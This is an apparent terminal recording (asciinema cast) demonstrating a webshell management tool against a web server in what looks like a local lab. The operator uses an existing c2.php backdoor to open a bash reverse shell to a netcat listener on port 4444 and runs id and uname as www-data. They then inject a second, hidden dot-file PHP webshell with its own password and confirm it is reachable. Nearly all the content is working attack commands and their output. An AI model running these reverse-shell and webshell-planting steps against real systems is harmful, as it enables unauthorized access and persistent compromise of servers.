[42.2707, "o", "\u001b[?25l\u001b[?7l\u001b[0;31ms\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[42.3325, "o", "\u001b[?25l\u001b[?7l\u001b[0;31mt\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[42.3944, "o", "\u001b[?25l\u001b[?7l\u001b[0;31me\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[42.4562, "o", "\u001b[?25l\u001b[?7l\u001b[0;31mn\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[42.5185, "o", "\u001b[?25l\u001b[?7l\u001b[C\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[42.5802, "o", "\u001b[?25l\u001b[?7l\u001b[0;33m-\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[42.6421, "o", "\u001b[?25l\u001b[?7l\b\u001b[0;31m--\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[42.7038, "o", "\u001b[?25l\u001b[?7l\u001b[0;31mt\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[42.7656, "o", "\u001b[?25l\u001b[?7l\u001b[0;31mo\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[42.8274, "o", "\u001b[?25l\u001b[?7l\u001b[0;31mo\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[42.8892, "o", "\u001b[?25l\u001b[?7l\u001b[0;31ml\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[42.951, "o", "\u001b[?25l\u001b[?7l\u001b[C\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[43.0128, "o", "\u001b[?25l\u001b[?7l\u001b[0;33mn\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[43.0746, "o", "\u001b[?25l\u001b[?7l\u001b[0;33mc\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[43.1364, "o", "\u001b[?25l\u001b[?7l\u001b[67D\u001b[0m\u001b[J\u001b[0;30;42;1m REMOTE \u001b[0m [0] /var/www/html > \u001b[0;32mpivot\u001b[0m \u001b[0;33mshell\u001b[0m \u001b[0;31m-m\u001b[0m \u001b[0;33mbash\u001b[0m \u001b[0;31m--listen\u001b[0m \u001b[0;31m--tool\u001b[0m \u001b[0;33mnc\u001b[67D\u001b[0m\r\r\n\u001b[J\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[43.1364, "o", "\u001b[?2004l"]
[43.1376, "o", "\u001b[1;32m[+] Listening on :4444 (nc); the shell should connect shortly.\u001b[0m\r\n"]
[43.1386, "o", "Listening on 0.0.0.0 4444\r\n"]
[44.142, "o", "\u001b[1;32m[+] Trying bash reverse shell (/usr/bin/bash) -> 172.16.1.1:4444\u001b[0m\r\n"]
[44.1449, "o", "Connection received on 172.16.1.5 44928\r\n"]
[44.1453, "o", "sh: 0: "]
[44.1453, "o", "can't access tty; job control turned off"]
[44.1453, "o", "\r\n"]
[44.1454, "o", "$ "]
[46.1519, "o", "i"]
[46.2121, "o", "d"]
[46.2724, "o", "\r\n"]
[46.2734, "o", "uid=33(www-data) gid=33(www-data) groups=33(www-data)\r\n$ "]
[47.7787, "o", "u"]
[47.839, "o", "n"]
[47.8993, "o", "a"]
[47.9595, "o", "m"]
[48.0198, "o", "e"]
[48.08, "o", " "]
[48.1402, "o", "-"]
[48.2005, "o", "a"]
[48.2607, "o", "\r\n"]
[48.2613, "o", "Linux 5dd92056d40a 6.8.0-117-generic #117-Ubuntu SMP PREEMPT_DYNAMIC Tue May  5 19:26:24 UTC 2026 x86_64 GNU/Linux\r\n"]
[48.2613, "o", "$ "]
[49.967, "o", "e"]
[50.0273, "o", "x"]
[50.0875, "o", "i"]
[50.1477, "o", "t"]
[50.2079, "o", "\r\n"]
[50.2097, "o", "\u001b[6n"]
[50.2105, "o", "\u001b[?2004h\u001b[?25l\u001b[0m\u001b[?7l\u001b[0m\u001b[J\u001b[0;30;42;1m REMOTE \u001b[0m [0] /var/www/html >\u001b[28D\u001b[29C\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[50.2114, "o", "\u001b[?25l\u001b[?7l\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[51.718, "o", "\u001b[?25l\u001b[?7l\u001b[0ms\u001b[0;38;2;102;102;102messions -c id\u001b[13D\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[51.7796, "o", "\u001b[?25l\u001b[?7l\u001b[0me\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[51.8413, "o", "\u001b[?25l\u001b[?7l\u001b[0ms\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[51.903, "o", "\u001b[?25l\u001b[?7l\u001b[0ms\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[51.9646, "o", "\u001b[?25l\u001b[?7l\u001b[0mi\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[52.0262, "o", "\u001b[?25l\u001b[?7l\u001b[0mo\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[52.0879, "o", "\u001b[?25l\u001b[?7l\u001b[0mn\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[52.1495, "o", "\u001b[?25l\u001b[?7l\u001b[7D\u001b[0;32msessions\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[52.2112, "o", "\u001b[?25l\u001b[?7l\u001b[0m \u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[52.2731, "o", "\u001b[?25l\u001b[?7l\u001b[0;33m-\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[52.3348, "o", "\u001b[?25l\u001b[?7l\b\u001b[0;31m-i\u001b[0m\u001b[K\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[52.3965, "o", "\u001b[?25l\u001b[?7l\u001b[C\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[52.4582, "o", "\u001b[?25l\u001b[?7l\u001b[0;33m1\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[52.5199, "o", "\u001b[?25l\u001b[?7l\u001b[42D\u001b[0m\u001b[J\u001b[0;30;42;1m REMOTE \u001b[0m [0] /var/www/html > \u001b[0;32msessions\u001b[0m \u001b[0;31m-i\u001b[0m \u001b[0;33m1\u001b[42D\u001b[0m\r\r\n\u001b[J\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[52.5199, "o", "\u001b[?2004l"]
[52.5206, "o", "\u001b[1;32m[+] Active session -> [1] POST http://127.0.0.1:8080/c2.php (password='c')\u001b[0m\r\n"]
[52.5211, "o", "\u001b[6n"]
[52.5218, "o", "\u001b[?2004h\u001b[?25l\u001b[0m\u001b[?7l\u001b[0m\u001b[J\u001b[0;30;42;1m REMOTE \u001b[0m [1] /var/www/html >\u001b[28D\u001b[29C\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[52.5226, "o", "\u001b[?25l\u001b[?7l\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[53.9287, "o", "\u001b[?25l\u001b[?7l\u001b[0mi\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[53.9903, "o", "\u001b[?25l\u001b[?7l\u001b[0mn\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[54.052, "o", "\u001b[?25l\u001b[?7l\u001b[0mj\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[54.1136, "o", "\u001b[?25l\u001b[?7l\u001b[0me\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[54.1752, "o", "\u001b[?25l\u001b[?7l\u001b[0mc\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[54.2369, "o", "\u001b[?25l\u001b[?7l\u001b[5D\u001b[0;32minject\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[54.2989, "o", "\u001b[?25l\u001b[?7l\u001b[C\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[54.3608, "o", "\u001b[?25l\u001b[?7l\u001b[0;33mw\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[54.4228, "o", "\u001b[?25l\u001b[?7l\u001b[0;33me\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[54.4846, "o", "\u001b[?25l\u001b[?7l\u001b[0;33mb\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[54.5467, "o", "\u001b[?25l\u001b[?7l\u001b[C\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[54.6087, "o", "\u001b[?25l\u001b[?7l\u001b[0;33m-\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[54.6703, "o", "\u001b[?25l\u001b[?7l\b\u001b[0;31m--\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[54.732, "o", "\u001b[?25l\u001b[?7l\u001b[0;31mp\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[54.7938, "o", "\u001b[?25l\u001b[?7l\u001b[0;31ma\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[54.8555, "o", "\u001b[?25l\u001b[?7l\u001b[0;31ms\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[54.9172, "o", "\u001b[?25l\u001b[?7l\u001b[0;31ms\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[54.9792, "o", "\u001b[?25l\u001b[?7l\u001b[0;31mw\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[55.0409, "o", "\u001b[?25l\u001b[?7l\u001b[0;31mo\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[55.1027, "o", "\u001b[?25l\u001b[?7l\u001b[0;31mr\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[55.1645, "o", "\u001b[?25l\u001b[?7l\u001b[0;31md\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[55.2262, "o", "\u001b[?25l\u001b[?7l\u001b[C\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[55.2879, "o", "\u001b[?25l\u001b[?7l\u001b[0;33ms\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[55.3497, "o", "\u001b[?25l\u001b[?7l\u001b[0;33m3\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[55.4124, "o", "\u001b[?25l\u001b[?7l\u001b[0;33mc\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[55.4741, "o", "\u001b[?25l\u001b[?7l\u001b[0;33mr\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[55.5362, "o", "\u001b[?25l\u001b[?7l\u001b[0;33m3\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[55.598, "o", "\u001b[?25l\u001b[?7l\u001b[0;33mt\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[55.6598, "o", "\u001b[?25l\u001b[?7l\u001b[57D\u001b[0m\u001b[J\u001b[0;30;42;1m REMOTE \u001b[0m [1] /var/www/html > \u001b[0;32minject\u001b[0m \u001b[0;33mweb\u001b[0m \u001b[0;31m--password\u001b[0m \u001b[0;33ms3cr3t\u001b[57D\u001b[0m\r\r\n\u001b[J\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[55.6598, "o", "\u001b[?2004l"]
[55.661, "o", "\u001b[95m[+] [inject] POST http://127.0.0.1:8080/c2.php (password='c')\u001b[0m\r\n"]
[55.6673, "o", "\u001b[1;32m[+] Injected: http://127.0.0.1:8080/.zSlWHtEspGEWufCm.php (password=s3cr3t)\u001b[0m\r\n"]
[55.6695, "o", "\u001b[1;32m[+] Verified reachable: http://127.0.0.1:8080/.zSlWHtEspGEWufCm.php\u001b[0m\r\n"]
[55.6705, "o", "\u001b[6n"]
[55.6718, "o", "\u001b[?2004h\u001b[?25l\u001b[0m\u001b[?7l\u001b[0m\u001b[J\u001b[0;30;42;1m REMOTE \u001b[0m [1] /var/www/html >\u001b[28D\u001b[29C\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[55.6732, "o", "\u001b[?25l\u001b[?7l\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[57.8619, "o", "\u001b[?25l\u001b[?7l\u001b[0mq\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[57.9235, "o", "\u001b[?25l\u001b[?7l\u001b[0mu\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[57.985, "o", "\u001b[?25l\u001b[?7l\u001b[0mi\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[58.0468, "o", "\u001b[?25l\u001b[?7l\u001b[3D\u001b[0;32mquit\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[58.1084, "o", "\u001b[?25l\u001b[?7l\u001b[33D\u001b[0m\u001b[J\u001b[0;30;42;1m REMOTE \u001b[0m [1] /var/www/html > \u001b[0;32mquit\u001b[33D\u001b[0m\r\r\n\u001b[J\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[58.1084, "o", "\u001b[?2004l"]
[58.1093, "o", "\u001b[95m[+] Saved session (2 shell(s)) to \u001b[0m\r\n\u001b[95m/home/ubuntu/Documents/dev/WangYihang/Webshell-Sniper/session_1782492137.json\u001b[0m\r\n"]
